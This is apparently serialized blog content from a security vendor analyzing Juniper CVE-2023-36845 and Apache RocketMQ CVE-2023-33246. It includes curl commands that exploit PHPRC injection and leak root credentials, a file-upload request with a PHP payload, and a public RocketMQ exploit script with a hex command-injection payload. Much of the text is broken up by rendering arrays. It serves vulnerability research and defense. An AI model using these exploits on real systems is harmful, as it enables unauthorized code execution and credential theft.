,88573,87674],{"class":1391},[1373,88575,88576,88578],{"class":1375,"line":4806},[1373,88577,87679],{"class":2206},[1373,88579,87682],{"class":1391},[1373,88581,88582,88584],{"class":1375,"line":4817},[1373,88583,87687],{"class":2206},[1373,88585,87637],{"class":1391},[1373,88587,88588,88590],{"class":1375,"line":4825},[1373,88589,87694],{"class":2206},[1373,88591,87697],{"class":1391},[1373,88593,88594,88596],{"class":1375,"line":4835},[1373,88595,87702],{"class":2206},[1373,88597,87705],{"class":1391},[1373,88599,88600,88602,88604,88606,88608,88610,88612,88614],{"class":1375,"line":4843},[1373,88601,6755],{"class":1397},[1373,88603,6758],{"class":2206},[1373,88605,87714],{"class":1391},[1373,88607,51790],{"class":1391},[1373,88609,4883],{"class":1387},[1373,88611,87721],{"class":1391},[1373,88613,183],{"class":1387},[1373,88615,6765],{"class":1397},[1373,88617,88618,88620,88622],{"class":1375,"line":4849},[1373,88619,11852],{"class":1397},[1373,88621,8230],{"class":4640},[1373,88623,6765],{"class":1397},[1373,88625,88626,88628,88630],{"class":1375,"line":4877},[1373,88627,48971],{"class":1397},[1373,88629,48974],{"class":2206},[1373,88631,6765],{"class":4640},[1373,88633,88634,88636,88638,88640,88642,88644,88646,88648,88650,88652,88654,88656],{"class":1375,"line":4915},[1373,88635,8246],{"class":1397},[1373,88637,48983],{"class":2206},[1373,88639,87750],{"class":1391},[1373,88641,183],{"class":1387},[1373,88643,6391],{"class":1391},[1373,88645,183],{"class":1387},[1373,88647,87759],{"class":1391},[1373,88649,183],{"class":1387},[1373,88651,87764],{"class":1391},[1373,88653,183],{"class":1387},[1373,88655,2180],{"class":4640},[1373,88657,6765],{"class":1397},[1373,88659,88660,88662,88664,88666,88668,88670,88672,88674,88676,88678,88680,88682,88684,88686,88688,88690],{"class":1375,"line":4931},[1373,88661,8246],{"class":1397},[1373,88663,30586],{"class":2206},[1373,88665,87779],{"class":1391},[1373,88667,183],{"class":1387},[1373,88669,49025],{"class":1391},[1373,88671,183],{"class":1387},[1373,88673,87788],{"class":1391},[1373,88675,183],{"class":1387},[1373,88677,87793],{"class":1391},[1373,88679,183],{"class":1387},[1373,88681,87798],{"class":1391},[1373,88683,183],{"class":1387},[1373,88685,49066],{"class":1391},[1373,88687,183],{"class":1387},[1373,88689,2180],{"class":4640},[1373,88691,6765],{"class":1397},[1373,88693,88694,88696,88698,88700,88702,88704,88706,88708,88710,88712,88714,88716,88718,88720],{"class":1375,"line":4947},[1373,88695,8246],{"class":1397},[1373,88697,51864],{"class":2206},[1373,88699,5384],{"class":4640},[1373,88701,15072],{"class":1391},[1373,88703,87821],{"class":1391},[1373,88705,27425],{"class":1391},[1373,88707,87826],{"class":1391},[1373,88709,87829],{"class":1391},[1373,88711,87832],{"class":1391},[1373,88713,87835],{"class":1391},[1373,88715,11852],{"class":1397},[1373,88717,87840],{"class":1391},[1373,88719,74628],{"class":4640},[1373,88721,6765],{"class":1397},[1373,88723,88724,88726,88728,88730,88732,88734,88736,88738,88740,88742,88744,88746,88748,88750,88752,88754],{"class":1375,"line":4952},[1373,88725,8246],{"class":1397},[1373,88727,30586],{"class":2206},[1373,88729,87779],{"class":1391},[1373,88731,183],{"class":1387},[1373,88733,87857],{"class":1391},[1373,88735,183],{"class":1387},[1373,88737,87788],{"class":1391},[1373,88739,1388],{"class":1387},[1373,88741,87866],{"class":1391},[1373,88743,1388],{"class":1387},[1373,88745,87798],{"class":1391},[1373,88747,183],{"class":1387},[1373,88749,87875],{"class":1391},[1373,88751,183],{"class":1387},[1373,88753,2180],{"class":4640},[1373,88755,6765],{"class":1397},[1373,88757,88758,88760,88762],{"class":1375,"line":6776},[1373,88759,48971],{"class":1397},[1373,88761,87888],{"class":2206},[1373,88763,6765],{"class":4640},[18,88765,88766],{},"When an attacker uses this form of attack, httpd.log (and all other logs as far as we can tell) are essentially useless. Determining if you’ve been compromised by a careful attacker will be quite difficult.",[61,88768,88770],{"id":88769},"summary","Summary",[18,88772,88773],{},"In this blog, we demonstrated how CVE-2023-36845, a vulnerability flagged as “Medium” severity by Juniper, can be used to remotely execute arbitrary code without authentication. We’ve turned a multi-step (but very good) exploit into an exploit that can be written using a single curl command and appears to affect more (older) systems.",[18,88775,88776],{},"Additionally, we found that the vast majority of internet-facing Juniper systems remain vulnerable to this issue. There is some evidence of exploitation in the wild, and given how slow patching is going, we suspect this will be a useful exploit for attackers for quite some time.",[61,88778,87045],{"id":87044},[993,88780,88782],{"id":88781},"cve-clarification","CVE Clarification",[18,88784,88785,88786,88790],{},"The original advisory published by Juniper (",[47,88787,88789],{"href":87394,"rel":88788},[51],"2023-08","), contains five CVE identifiers, but only two CVE descriptions (they are repeated between the five) and one (entirely erroneous) CVSSv3 score for all of the vulnerabilities. There is essentially no way to distinguish CVE-2023-36844 and CVE-2023-36845 from CVE-2023-36846, or CVE-2023-36847 from CVE-2023-36851. To be clear, this is not how CVE descriptions should work, and Juniper should do better.",[18,88792,88793],{},"watchtowr refers to CVE-2023-36845 and CVE-2023-36846 in their writeup, so, for consistency, we do as well.",[993,88795,88797],{"id":88796},"secondary-file-upload-mechanism","Secondary File Upload Mechanism",[18,88799,88800,88801,88803],{},"Our test system has the Appweb file upload mechanism enabled. An attacker could upload arbitrary files to ",[886,88802,87452],{}," like so:",[1354,88805,88807],{"className":31740,"code":88806,"language":2186,"meta":219,"style":219},"curl -v -F 'upload=@\u002Ftmp\u002Fphp.ini' http:\u002F\u002F10.12.72.1\u002F\n",[886,88808,88809],{"__ignoreMap":219},[1373,88810,88811,88813,88815,88817,88819,88822,88824],{"class":1375,"line":1376},[1373,88812,1557],{"class":2206},[1373,88814,45584],{"class":2209},[1373,88816,88481],{"class":2209},[1373,88818,4713],{"class":1387},[1373,88820,88821],{"class":1391},"upload=@\u002Ftmp\u002Fphp.ini",[1373,88823,1388],{"class":1387},[1373,88825,88826],{"class":1391}," http:\u002F\u002F10.12.72.1\u002F\n",[18,88828,88829],{},"On the firewall, a file will be created with the name of “MPR_%d_%d_%d.tmp”. Where the first %d is the httpd process ID. The second %d is a 16-bit number calculated using the current time, and the last %d is a one-up counter. These values are small enough that they could be brute-forced and used with the original watchTowr exploit.",[1354,88831,88833],{"className":31740,"code":88832,"language":2186,"meta":219,"style":219},"root@junSRX210% ls -l\ntotal 32\n-rw-r--r-- 1 nobody wheel 96 Sep 13 23:15 MPR_1479_59421_1.tmp\nroot@junSRX210% cat MPR_1479_59421_1.tmp\nallow_url_include=On\nauto_prepend_file=\"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==\"\n",[886,88834,88835,88845,88852,88879,88887,88896],{"__ignoreMap":219},[1373,88836,88837,88840,88843],{"class":1375,"line":1376},[1373,88838,88839],{"class":2206},"root@junSRX210%",[1373,88841,88842],{"class":1391}," ls",[1373,88844,70286],{"class":2209},[1373,88846,88847,88849],{"class":1375,"line":220},[1373,88848,43165],{"class":2206},[1373,88850,88851],{"class":5467}," 32\n",[1373,88853,88854,88856,88858,88861,88864,88867,88870,88873,88876],{"class":1375,"line":1266},[1373,88855,55888],{"class":2206},[1373,88857,55853],{"class":5467},[1373,88859,88860],{"class":1391}," nobody",[1373,88862,88863],{"class":1391}," wheel",[1373,88865,88866],{"class":5467}," 96",[1373,88868,88869],{"class":1391}," Sep",[1373,88871,88872],{"class":5467}," 13",[1373,88874,88875],{"class":1391}," 23:15",[1373,88877,88878],{"class":1391}," MPR_1479_59421_1.tmp\n",[1373,88880,88881,88883,88885],{"class":1375,"line":1852},[1373,88882,88839],{"class":2206},[1373,88884,70263],{"class":1391},[1373,88886,88878],{"class":1391},[1373,88888,88889,88891,88893],{"class":1375,"line":4692},[1373,88890,87924],{"class":4640},[1373,88892,5417],{"class":1397},[1373,88894,88895],{"class":1391},"On\n",[1373,88897,88898,88900,88902,88904,88907],{"class":1375,"line":4724},[1373,88899,87511],{"class":4640},[1373,88901,5417],{"class":1397},[1373,88903,183],{"class":1387},[1373,88905,88906],{"class":1391},"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==",[1373,88908,19057],{"class":1387},[61,88910,88912],{"id":88911},"root-credentials-disclosure","Root Credentials Disclosure",[18,88914,88915,88916,88919,88920,88923,88924,88926],{},"Using the file disclosure mechanism mentioned above, we are able to leak the root credentials as they were at configuration time. We have no idea if this works on even slightly modern Juniper, but it was a neat tidbit. There is a file called ",[886,88917,88918],{},"wiz_config_server.txt"," sitting in ",[886,88921,88922],{},"\u002Fvar\u002Ftmp\u002F",". Here is a very truncated version that shows the ",[886,88925,48771],{}," user password:",[1354,88928,88930],{"className":31740,"code":88929,"language":2186,"meta":219,"style":219},"$ curl -kv \"http:\u002F\u002F10.12.72.1\u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0\" --data-binary 'auto_prepend_file=\"\u002Fvar\u002Ftmp\u002Fwiz_config_server.txt\"'\n* Trying 10.12.72.1:80...\n* TCP_NODELAY set\n* Connected to 10.12.72.1 (10.12.72.1) port 80 (#0)\n> POST \u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0 HTTP\u002F1.1\n> Host: 10.12.72.1\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Length: 50\n> Content-Type: application\u002Fx-www-form-urlencoded\n>\n* upload completely sent off: 50 out of 50 bytes\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Wed, 13 Sep 2023 23:27:51 GMT\n\u003C Server: Embedthis-Appweb\u002F3.2.3\n\u003C Cache-Control: no-cache\n\u003C ETag: \"1e0cc-40e-51b0b0ec\"\n\u003C Content-Type: text\u002Fhtml\n\u003C Connection: keep-alive\n\u003C Keep-Alive: timeout=120, max=199\n\u003C Last-Modified: Wed, 13 Sep 2023 23:27:51 GMT\n\u003C x-powered-by: PHP\u002F5.3.2\n\u003C Transfer-Encoding: chunked\n\u003C\n…\n\",\\\\\\\"rootpassword\\\\\\\":\\\\\\\"labpass1\\\\\\\",\n…\n",[886,88931,88932,88956,88963,88969,88982,88993,89000,89006,89018,89025,89032,89036,89043,89049,89056,89063,89070,89077,89091,89098,89105,89125,89132,89139,89145,89149,89154,89178],{"__ignoreMap":219},[1373,88933,88934,88936,88938,88940,88942,88945,88947,88949,88951,88954],{"class":1375,"line":1376},[1373,88935,4644],{"class":2206},[1373,88937,2222],{"class":1391},[1373,88939,82377],{"class":2209},[1373,88941,4883],{"class":1387},[1373,88943,88944],{"class":1391},"http:\u002F\u002F10.12.72.1\u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,88946,183],{"class":1387},[1373,88948,87572],{"class":2209},[1373,88950,4713],{"class":1387},[1373,88952,88953],{"class":1391},"auto_prepend_file=\"\u002Fvar\u002Ftmp\u002Fwiz_config_server.txt\"",[1373,88955,76063],{"class":1387},[1373,88957,88958,88960],{"class":1375,"line":220},[1373,88959,35613],{"class":1397},[1373,88961,88962],{"class":4640}," Trying 10.12.72.1:80...\n",[1373,88964,88965,88967],{"class":1375,"line":1266},[1373,88966,35613],{"class":1397},[1373,88968,76077],{"class":4640},[1373,88970,88971,88973,88976,88979],{"class":1375,"line":1852},[1373,88972,35613],{"class":1397},[1373,88974,88975],{"class":4640}," Connected to 10.12.72.1 (",[1373,88977,88978],{"class":2206},"10.12.72.1",[1373,88980,88981],{"class":4640},") port 80 (#0)\n",[1373,88983,88984,88986,88988,88991],{"class":1375,"line":4692},[1373,88985,5384],{"class":1397},[1373,88987,76355],{"class":2206},[1373,88989,88990],{"class":1391}," \u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,88992,35589],{"class":1391},[1373,88994,88995,88997],{"class":1375,"line":4724},[1373,88996,5384],{"class":1397},[1373,88998,88999],{"class":4640}," Host: 10.12.72.1\n",[1373,89001,89002,89004],{"class":1375,"line":4756},[1373,89003,5384],{"class":1397},[1373,89005,35603],{"class":4640},[1373,89007,89008,89010,89012,89014,89016],{"class":1375,"line":4768},[1373,89009,5384],{"class":1397},[1373,89011,35610],{"class":4640},[1373,89013,35613],{"class":1397},[1373,89015,2180],{"class":4640},[1373,89017,35618],{"class":1397},[1373,89019,89020,89022],{"class":1375,"line":4792},[1373,89021,5384],{"class":1397},[1373,89023,89024],{"class":4640}," Content-Length: 50\n",[1373,89026,89027,89029],{"class":1375,"line":4798},[1373,89028,5384],{"class":1397},[1373,89030,89031],{"class":4640}," Content-Type: application\u002Fx-www-form-urlencoded\n",[1373,89033,89034],{"class":1375,"line":4806},[1373,89035,6765],{"class":1397},[1373,89037,89038,89040],{"class":1375,"line":4817},[1373,89039,35613],{"class":1397},[1373,89041,89042],{"class":4640}," upload completely sent off: 50 out of 50 bytes\n",[1373,89044,89045,89047],{"class":1375,"line":4825},[1373,89046,35613],{"class":1397},[1373,89048,76148],{"class":4640},[1373,89050,89051,89053],{"class":1375,"line":4835},[1373,89052,11852],{"class":1397},[1373,89054,89055],{"class":4640}," HTTP\u002F1.1 200 OK\n",[1373,89057,89058,89060],{"class":1375,"line":4843},[1373,89059,11852],{"class":1397},[1373,89061,89062],{"class":4640}," Date: Wed, 13 Sep 2023 23:27:51 GMT\n",[1373,89064,89065,89067],{"class":1375,"line":4849},[1373,89066,11852],{"class":1397},[1373,89068,89069],{"class":4640}," Server: Embedthis-Appweb\u002F3.2.3\n",[1373,89071,89072,89074],{"class":1375,"line":4877},[1373,89073,11852],{"class":1397},[1373,89075,89076],{"class":4640}," Cache-Control: no-cache\n",[1373,89078,89079,89081,89084,89086,89089],{"class":1375,"line":4915},[1373,89080,11852],{"class":1397},[1373,89082,89083],{"class":4640}," ETag: ",[1373,89085,183],{"class":1387},[1373,89087,89088],{"class":1391},"1e0cc-40e-51b0b0ec",[1373,89090,19057],{"class":1387},[1373,89092,89093,89095],{"class":1375,"line":4931},[1373,89094,11852],{"class":1397},[1373,89096,89097],{"class":4640}," Content-Type: text\u002Fhtml\n",[1373,89099,89100,89102],{"class":1375,"line":4947},[1373,89101,11852],{"class":1397},[1373,89103,89104],{"class":4640}," Connection: keep-alive\n",[1373,89106,89107,89109,89112,89114,89117,89120,89122],{"class":1375,"line":4952},[1373,89108,11852],{"class":1397},[1373,89110,89111],{"class":4640}," Keep-Alive: timeout",[1373,89113,5417],{"class":1397},[1373,89115,89116],{"class":1391},"120,",[1373,89118,89119],{"class":4640}," max",[1373,89121,5417],{"class":1397},[1373,89123,89124],{"class":1391},"199\n",[1373,89126,89127,89129],{"class":1375,"line":6776},[1373,89128,11852],{"class":1397},[1373,89130,89131],{"class":4640}," Last-Modified: Wed, 13 Sep 2023 23:27:51 GMT\n",[1373,89133,89134,89136],{"class":1375,"line":6781},[1373,89135,11852],{"class":1397},[1373,89137,89138],{"class":4640}," x-powered-by: PHP\u002F5.3.2\n",[1373,89140,89141,89143],{"class":1375,"line":7524},[1373,89142,11852],{"class":1397},[1373,89144,76297],{"class":4640},[1373,89146,89147],{"class":1375,"line":7530},[1373,89148,35662],{"class":1397},[1373,89150,89151],{"class":1375,"line":7546},[1373,89152,89153],{"class":2206},"…\n",[1373,89155,89156,89159,89162,89165,89167,89169,89171,89174,89176],{"class":1375,"line":7571},[1373,89157,89158],{"class":2206},"\",",[1373,89160,89161],{"class":2326},"\\\\\\\"",[1373,89163,89164],{"class":2206},"rootpassword",[1373,89166,89161],{"class":2326},[1373,89168,4606],{"class":2206},[1373,89170,89161],{"class":2326},[1373,89172,89173],{"class":2206},"labpass1",[1373,89175,89161],{"class":2326},[1373,89177,9062],{"class":2206},[1373,89179,89180],{"class":1375,"line":7598},[1373,89181,89153],{"class":2206},[2901,89183,89184],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":89186},[89187,89188,89189,89190,89191,89192,89193,89197],{"id":3520,"depth":220,"text":20},{"id":11272,"depth":220,"text":11273},{"id":87496,"depth":220,"text":87497},{"id":87899,"depth":220,"text":87900},{"id":88414,"depth":220,"text":88415},{"id":88769,"depth":220,"text":88770},{"id":87044,"depth":220,"text":87045,"children":89194},[89195,89196],{"id":88781,"depth":1266,"text":88782},{"id":88796,"depth":1266,"text":88797},{"id":88911,"depth":220,"text":88912},"Learn about VulnCheck's development of an exploit for CVE-2023-36845, leading to stealthy code execution on Juniper firewalls, while also assessing the prevalence of unpatched systems in the wild.",{"slug":89200},"juniper-cve-2023-36845","\u002Fblog\u002Fjuniper-cve-2023-36845",{"title":35931,"description":89198},"blog\u002Fjuniper-cve-2023-36845",[242],"ROw9XYsws8k15BFBUFBxC73bLlY6igz1kV08IrtLavo",{"id":89207,"title":83500,"articles":89208,"authors":89232,"body":89234,"date":89923,"description":89924,"extension":234,"image":7,"link":7,"meta":89925,"navigation":237,"path":89927,"seo":89928,"series":7,"stem":89929,"subtype":7,"tags":89930,"__hash__":89931},"blog\u002Fblog\u002Frocketmq-exploit-payloads.md",[89209,89213,89216,89220,89224,89228],{"title":89210,"source":3494,"link":89211,"date":89212},"Risky Biz News: China cracks down on the SE Asia scam call center problem","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fchina-cracks-down-on-se-asia-scam-call-centers","2023-09-06",{"title":89214,"source":39566,"link":89215,"date":89212},"A new Agent Tesla variant. Hot wallet hacks. DevSecOps and AI. Notes on the labor market. Two threats in a hybrid war: Fancy Bear and NoName057(16).","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F170",{"title":89217,"source":14373,"link":89218,"date":89219},"CISA warns of critical Apache RocketMQ bug exploited in attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcisa-warns-of-critical-apache-rocketmq-bug-exploited-in-attacks\u002F","2023-09-07",{"title":89221,"source":57680,"link":89222,"date":89223},"CISA Adds Critical RocketMQ Bug to Must-Patch List","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fcisa-critical-rocketmq-bug\u002F","2023-09-08",{"title":89225,"source":14390,"link":89226,"date":89227},"US CISA ADDED CRITICAL APACHE ROCKETMQ FLAW TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG","https:\u002F\u002Fsecurityaffairs.com\u002F150551\u002Fhacking\u002Fcisa-apache-rocketmq-known-exploited-vulnerabilities-catalog.html","2023-09-09",{"title":89229,"source":11233,"link":89230,"date":89231},"CISA adds critical Apache RocketMQ flaw in KEV catalog","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fcisa-adds-critical-apache-rocketmq-flaw-in-kev-catalog","2023-09-10",[89233],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":89235,"toc":89916},[89236,89256,89259,89268,89274,89277,89280,89289,89570,89573,89590,89597,89836,89842,89846,89852,89856,89862,89866,89903,89905,89908,89910,89913],[18,89237,89238,89243,89244,89249,89250,89255],{},[47,89239,89242],{"href":89240,"rel":89241},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-33246",[51],"CVE-2023-33246"," is an easy to exploit vulnerability affecting Apache ",[47,89245,89248],{"href":89246,"rel":89247},"https:\u002F\u002Frocketmq.apache.org\u002F",[51],"RocketMQ",". The vulnerability allows a remote and unauthenticated attacker to update the RocketMQ broker configuration in order to abuse a command injection. ",[47,89251,89254],{"href":89252,"rel":89253},"https:\u002F\u002Fblogs.juniper.net\u002Fen-us\u002Fthreat-research\u002Fdreambus-botnet-resurfaces-targets-rocketmq-vulnerability",[51],"Juniper Networks"," has reported exploitation of this issue has been ongoing since June 2023.",[18,89257,89258],{},"Exploitation occurs via a custom remoting protocol to the RocketMQ broker ports (by default 10909 and 10911). That’s important to note because neither Shodan or Censys specifically detect this protocol. Shodan does an especially bad job of indexing these ports. That makes it hard to determine the actual scope of vulnerable systems in the wild.",[18,89260,89261,89262,89267],{},"Fortunately, Censys can be manipulated into giving us some insight. By searching for hosts that expose tcp\u002F9876 (RocketMQ nameserver) and one of the default broker ports (tcp\u002F10909 and tcp\u002F10911), we find approximately ",[47,89263,89266],{"href":89264,"rel":89265},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.port%3D9876+and+%28services.port%3D10909+or+services.port%3D10911%29",[51],"4500"," potentially affected systems. However, the extreme concentration of systems in one country does call into question how many of these may be honeypots.",[18,89269,89270],{},[68,89271],{":width":10862,"alt":89272,"src":89273},"Potential RocketMQ brokers on Censys","\u002Fblog\u002Frocketmq-exploit-payloads\u002Frocketmq-censys.png",[18,89275,89276],{},"The RocketMQ broker was never meant to be exposed to the internet. The interface is insecure by design and offers a variety of administrative functions. Updating the broker configuration is only one of those functions. Another one, useful for defenders, is downloading the broker configuration, freely without authentication.",[18,89278,89279],{},"When the attacker updates the broker configuration with a malicious “rocketmqHome” variable, the attacker payload doesn’t get executed immediately. Instead, the payload is written into the configuration file. Some seconds later, a process parses the configuration, and executes a shell command containing the malicious variable, resulting in attacker code execution. The important part is, unless they overwrite it, the attacker payload persists in the configuration indefinitely.",[18,89281,89282,89283,89288],{},"If you understand the protocol, it’s very easy to download the configuration file so that you can examine it for indicators of compromise. Looking at some of the public exploits, such as ",[47,89284,89287],{"href":89285,"rel":89286},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb486dcf3f31d",[51],"XDB-b486dcf3f31d",", you can see some attackers are just throwing blobs of hex at victims.",[1354,89290,89292],{"className":11719,"code":89291,"language":11721,"meta":219,"style":219},"if '__main__' == __name__:\n ip = sys.argv[1]\n port = int(sys.argv[2]) \n command = ' '.join(sys.argv[3:]).strip()\n hex_payload_prefix = '000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20' \n hex_payload_suffix = '3b0a'\n payload = bytes.fromhex(hex_payload_prefix) + command.encode() + bytes.fromhex(hex_payload_suffix)\n hex_payload_length = hex(len(payload) - 4)[2:]\n payload = payload.hex().replace('000000cd000000','000000' + hex_payload_length + '000000')\n payload = bytes.fromhex(payload)\n",[886,89293,89294,89312,89333,89358,89393,89409,89423,89469,89502,89552],{"__ignoreMap":219},[1373,89295,89296,89298,89300,89303,89305,89307,89310],{"class":1375,"line":1376},[1373,89297,4637],{"class":4636},[1373,89299,4713],{"class":1387},[1373,89301,89302],{"class":1391},"__main__",[1373,89304,1388],{"class":1387},[1373,89306,16406],{"class":1397},[1373,89308,89309],{"class":9383}," __name__",[1373,89311,11747],{"class":1383},[1373,89313,89314,89317,89319,89322,89324,89327,89329,89331],{"class":1375,"line":220},[1373,89315,89316],{"class":4640}," ip ",[1373,89318,5417],{"class":1397},[1373,89320,89321],{"class":4640}," sys",[1373,89323,59],{"class":1383},[1373,89325,89326],{"class":63570},"argv",[1373,89328,7035],{"class":1383},[1373,89330,467],{"class":5467},[1373,89332,7103],{"class":1383},[1373,89334,89335,89338,89340,89342,89344,89346,89348,89350,89352,89354,89356],{"class":1375,"line":1266},[1373,89336,89337],{"class":4640}," port ",[1373,89339,5417],{"class":1397},[1373,89341,48340],{"class":9165},[1373,89343,1384],{"class":1383},[1373,89345,70245],{"class":11735},[1373,89347,59],{"class":1383},[1373,89349,89326],{"class":63570},[1373,89351,7035],{"class":1383},[1373,89353,353],{"class":5467},[1373,89355,48026],{"class":1383},[1373,89357,47181],{"class":4640},[1373,89359,89360,89362,89364,89366,89368,89370,89373,89375,89377,89379,89381,89383,89385,89388,89391],{"class":1375,"line":1852},[1373,89361,18006],{"class":4640},[1373,89363,5417],{"class":1397},[1373,89365,4713],{"class":1387},[1373,89367,4713],{"class":1387},[1373,89369,59],{"class":1383},[1373,89371,89372],{"class":11735},"join",[1373,89374,1384],{"class":1383},[1373,89376,70245],{"class":11735},[1373,89378,59],{"class":1383},[1373,89380,89326],{"class":63570},[1373,89382,7035],{"class":1383},[1373,89384,491],{"class":5467},[1373,89386,89387],{"class":1383},":]).",[1373,89389,89390],{"class":11735},"strip",[1373,89392,27326],{"class":1383},[1373,89394,89395,89398,89400,89402,89405,89407],{"class":1375,"line":4692},[1373,89396,89397],{"class":4640}," hex_payload_prefix ",[1373,89399,5417],{"class":1397},[1373,89401,4713],{"class":1387},[1373,89403,89404],{"class":1391},"000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20",[1373,89406,1388],{"class":1387},[1373,89408,47181],{"class":4640},[1373,89410,89411,89414,89416,89418,89421],{"class":1375,"line":4724},[1373,89412,89413],{"class":4640}," hex_payload_suffix ",[1373,89415,5417],{"class":1397},[1373,89417,4713],{"class":1387},[1373,89419,89420],{"class":1391},"3b0a",[1373,89422,76063],{"class":1387},[1373,89424,89425,89428,89430,89432,89434,89437,89439,89442,89444,89446,89448,89450,89452,89454,89456,89458,89460,89462,89464,89467],{"class":1375,"line":4756},[1373,89426,89427],{"class":4640}," payload ",[1373,89429,5417],{"class":1397},[1373,89431,57298],{"class":9165},[1373,89433,59],{"class":1383},[1373,89435,89436],{"class":11735},"fromhex",[1373,89438,1384],{"class":1383},[1373,89440,89441],{"class":11735},"hex_payload_prefix",[1373,89443,2230],{"class":1383},[1373,89445,15478],{"class":1397},[1373,89447,16726],{"class":4640},[1373,89449,59],{"class":1383},[1373,89451,11778],{"class":11735},[1373,89453,7514],{"class":1383},[1373,89455,15478],{"class":1397},[1373,89457,57298],{"class":9165},[1373,89459,59],{"class":1383},[1373,89461,89436],{"class":11735},[1373,89463,1384],{"class":1383},[1373,89465,89466],{"class":11735},"hex_payload_suffix",[1373,89468,11875],{"class":1383},[1373,89470,89471,89474,89476,89479,89481,89484,89486,89488,89490,89492,89494,89497,89499],{"class":1375,"line":4768},[1373,89472,89473],{"class":4640}," hex_payload_length ",[1373,89475,5417],{"class":1397},[1373,89477,89478],{"class":1379}," 